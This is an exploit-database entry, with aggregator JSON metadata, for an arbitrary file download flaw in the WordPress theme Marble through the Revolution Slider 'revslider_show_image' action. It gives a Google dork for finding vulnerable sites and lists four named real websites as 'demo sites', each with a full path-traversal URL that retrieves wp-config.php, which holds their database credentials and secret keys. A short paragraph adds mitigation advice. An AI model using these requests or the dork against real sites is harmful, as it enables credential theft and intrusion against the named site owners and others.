ID 1337DAY-ID-22650
Type zdt
Reporter null_pointer
Modified 2014-09-17T00:00:00
Description
Exploit for php platform in category web applications
Exploit Title : WordPress Theme Marble Arbitrary File Download Vulnerability
Exploit Author : NULL_Pointer
Date : 17/09/2014
Vendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650
Version: 1.1.2
Google Dork : inurl:"/wp-content/themes/marble/"
Tested on : Linux, Windows 7
--------------------------------------------------------------
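The WordPress theme Marble suffers from an arbitrary file download vulnerability.
The requests below go to the `revslider_show_image` action of `admin-ajax.php`; its `img` parameter is evidently used as a file path without being restricted to image files, so a single GET request can return files such as `wp-config.php`, which holds the database credentials and secret keys.
The action name suggests the flaw sits in the Revolution Slider plugin bundled with the theme rather than in the theme's own code (not confirmed by this advisory).
Site owners should update the theme and its bundled slider, search access logs for `action=revslider_show_image` requests whose `img` value contains `../` or ends in `.php`, and rotate the database password and WordPress salts if such requests are found.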
Exploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]
Demo Sites :
http://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
{"id": "1337DAY-ID-22650", "bulletinFamily": "exploit", "title": "WordPress Theme Marble Arbitrary File Download Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2014-09-17T00:00:00", "modified": "2014-09-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/22650", "reporter": "null_pointer", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-04-02T21:31:07", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:25:30", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "hash": "b9e26a820b040f37619b35d34e8c0481876e9060bb27c158fa84946381483f3d", "hashmap": [{"hash": "155e59596c830b17290f2d7984bcc7de", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "52b89df2e22e15c3d2c162778815a51e", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e5fd65f28401ece7c8d8ab1dc181a43c", "key": "reporter"}, {"hash": "f170f2f63087a64ea9e1f15156b68e04", "key": "sourceData"}, {"hash": "e771aed2608208fcd629fdbc3a498f30", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "33a34d32db0fbd47c51c03c1b1ba7171", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "e771aed2608208fcd629fdbc3a498f30", "key": "published"}], "history": [], "href": "http://0day.today/exploit/description/22650", "id": "1337DAY-ID-22650", "lastseen": "2016-04-20T01:25:30", "modified": "2014-09-17T00:00:00", "objectVersion": "1.0", "published": "2014-09-17T00:00:00", "references": [], "reporter": 
"null_pointer", "sourceData": "Exploit Title : WordPress Theme Marble Arbitrary File Download Vulnerability\r\n\r\nExploit Author : NULL_Pointer\r\n\r\nDate : 17/09/2014\r\n\r\nVendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650\r\n\r\nVersion: 1.1.2\r\n\r\nGoogle Dork : inurl:\"/wp-content/themes/marble/\"\r\n\r\nTested on : Linux, Windows 7\r\n\r\n--------------------------------------------------------------\r\n\r\nWordPress Theme Marble suffers from Arbitrary File Download Vulnerability.\r\n\r\nExploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]\r\n\r\nDemo Sites :\r\n\r\nhttp://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/22650", "title": "WordPress Theme Marble Arbitrary File Download Vulnerability", "type": "zdt", "viewCount": 6}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:25:30"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "ae66ce2c03b62d362e2fffa3325b1c33"}, {"key": "modified", "hash": "e771aed2608208fcd629fdbc3a498f30"}, {"key": "published", "hash": "e771aed2608208fcd629fdbc3a498f30"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e5fd65f28401ece7c8d8ab1dc181a43c"}, 
{"key": "sourceData", "hash": "9383cd9d0fdb14c0973895d3ecfe2ca0"}, {"key": "sourceHref", "hash": "eea27d7b826dce73c2a0721b47d7d39f"}, {"key": "title", "hash": "155e59596c830b17290f2d7984bcc7de"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "f13d66f808b320063342210e74a2123137f1336e15a7c96cda502306cf52ecaf", "viewCount": 7, "enchantments": {"vulnersScore": 5.0}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/22650", "sourceData": "Exploit Title : WordPress Theme Marble Arbitrary File Download Vulnerability\r\n\r\nExploit Author : NULL_Pointer\r\n\r\nDate : 17/09/2014\r\n\r\nVendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650\r\n\r\nVersion: 1.1.2\r\n\r\nGoogle Dork : inurl:\"/wp-content/themes/marble/\"\r\n\r\nTested on : Linux, Windows 7\r\n\r\n--------------------------------------------------------------\r\n\r\nWordPress Theme Marble suffers from Arbitrary File Download Vulnerability.\r\n\r\nExploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]\r\n\r\nDemo Sites :\r\n\r\nhttp://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\nhttp://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\n\n# 0day.today [2018-04-02] #"}
{"result": {}}